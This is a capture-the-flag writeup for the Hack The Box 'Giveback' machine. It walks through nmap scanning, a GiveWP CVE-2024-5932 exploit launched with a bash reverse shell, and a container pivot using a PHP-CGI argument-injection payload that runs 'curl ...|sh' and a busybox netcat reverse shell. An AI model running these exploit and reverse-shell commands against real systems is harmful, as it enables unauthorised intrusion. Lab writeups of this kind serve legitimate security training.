WordPress

Hack The Box - Season 9 HTB Giveback Writeup - Easy - Weekly - November 1th, 2025

1337 Sheets
1337 Sheets
·
Hack The Box - Season 9 HTB Giveback Writeup - Easy - Weekly - November 1th, 2025

HackTheBox - GiveBack Writeup

Difficulty: Medium
OS: Linux

Reconnaissance

Nmap Scan

nmap -sC -sV -p- giveback.htb

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 66:f8:9c:58:f4:b8:59:bd:cd:ec:92:24:c3:97:8e:9e (ECDSA)
|_  256 96:31:8a:82:1a:65:9f:0a:a2:6c:ff:4d:44:7c:d3:94 (ED25519)
80/tcp open  http    nginx 1.28.0
|_http-generator: WordPress 6.8.1
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: nginx/1.28.0
|_http-title: GIVING BACK IS WHAT MATTERS MOST – OBVI

Key Findings:

  • SSH on port 22
  • WordPress 6.8.1 running on nginx 1.28.0
  • Domain: giveback.htb

Initial Access - WordPress Exploitation

WordPress Enumeration

wpscan --url http://giveback.htb

Discovery: The website uses the GiveWP plugin, which is vulnerable to CVE-2024-5932.

Exploiting CVE-2024-5932 (GiveWP RCE)

Exploit Repository: CVE-2024-5932

Setup:

cd CVE-2024-5932
pip install -r requirements.txt

Start Listener:

nc -lvnp 1234

Execute Exploit:

python3 CVE-2024-5932-rce.py \
  -u "http://giveback.htb/donations/the-things-we-need/" \
  -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/1234 0>&1'" 2>&1 | tail -15

Result: Reverse shell obtained!

Initial Shell

Container Enumeration

Environment File Discovery

cat /opt/bitnami/wordpress/wp-content/uploads/env.txt

Key Findings:

BETA_VINO_WP_MARIADB_SERVICE_HOST=10.43.147.82
LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241

Important Discovery: Another container running at 10.43.2.241:5000

Container Escape - Legacy Intranet Service

PHP-CGI Vulnerability Exploitation

In Your Host Create Payload:

cat > x << 'EOF'
busybox nc 10.10.X.X 4321 -e /bin/sh
EOF

Start HTTP Server:

python -m http.server 8000

Start Listener:

nc -lvnp 4321

In The RCE Shell Execute PHP-CGI Exploit:

php -r "\$c=stream_context_create(['http'=>['method'=>'POST','content'=>'curl 10.10.X.X:8000/x|sh']]); \
echo file_get_contents('http://10.43.2.241:5000/cgi-bin/php-cgi?-d+allow_url_include=1+-d+auto_prepend_file=php://input',0,\$c);"